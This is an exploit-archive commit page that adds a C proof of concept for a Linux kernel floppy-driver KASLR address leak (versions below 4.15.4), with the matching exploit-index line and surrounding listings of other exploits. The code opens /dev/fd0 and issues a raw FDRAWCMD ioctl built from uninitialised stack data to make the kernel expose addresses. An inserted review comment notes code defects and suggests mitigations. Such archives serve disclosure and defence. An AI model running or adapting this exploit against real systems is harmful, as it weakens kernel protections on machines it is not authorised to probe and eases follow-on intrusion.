DB: 2018-03-23

1 changes to exploits/shellcodes

Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak
Offensive Security 2018-03-23 05:01:51 +00:00
parent ce0c08bf93
commit 31a39a07b9
2 changed files with 41 additions and 0 deletions


@ -0,0 +1,40 @@
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>
static int drive_selector(int head) {
return (head << 2);
}
void fd_recalibrate(int fd) {
struct floppy_raw_cmd raw_cmd;
int tmp;
raw_cmd.flags = FD_RAW_INTR;
raw_cmd.cmd_count = 2;
// set up the command
raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07;
raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0);
tmp = ioctl( fd, FDRAWCMD, &raw_cmd );
printf("Status:%d\n",tmp);
}
int main(){
printf("Start\n");
char *d;
struct floppy_raw_cmd *cmd;
int fd;
fd = open("/dev/fd0",O_RDWR | O_NDELAY);
fd_recalibrate(fd);
close(fd);
printf("End\n");
return 0;
}
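Review bot: The new file carries no header comment, so nothing in it says what `fd_recalibrate` demonstrates, which kernels are affected or where the result shows up; a line such as `/* PoC for the 'show_floppy' address leak in Linux kernel < 4.15.4; sends one FDRAWCMD to /dev/fd0 */` at the top would tie it to the commit title. In `main`, the result of `open("/dev/fd0", ...)` is passed straight to `fd_recalibrate` without an `if (fd < 0) { perror("open"); return 1; }` check, `d` and `cmd` are never used, and as shown `ioctl` is called without `#include <sys/ioctl.h>`. In `fd_recalibrate`, `raw_cmd` is an uninitialised stack struct and `cmd_count` starts at 2, so `cmd[0]` and `cmd[1]` hold whatever was on the stack when the ioctl is issued; if that is intended it needs a comment saying so. For readers triaging exposure, the page supports only the version bound in the title; limiting who can open `/dev/fd0` and, if the addresses surface in the kernel log (not shown here), setting `kernel.dmesg_restrict=1` are the usual interim controls.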


@ -9609,6 +9609,7 @@ id,file,description,date,author,type,platform,port
44313,exploits/windows_x86-64/local/44313.txt,"Microsoft Windows - Desktop Bridge VFS Privilege Escalation",2018-03-20,"Google Security Research",local,windows_x86-64, 44313,exploits/windows_x86-64/local/44313.txt,"Microsoft Windows - Desktop Bridge VFS Privilege Escalation",2018-03-20,"Google Security Research",local,windows_x86-64,
44314,exploits/windows/local/44314.ps1,"Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows, 44314,exploits/windows/local/44314.ps1,"Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows, 44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
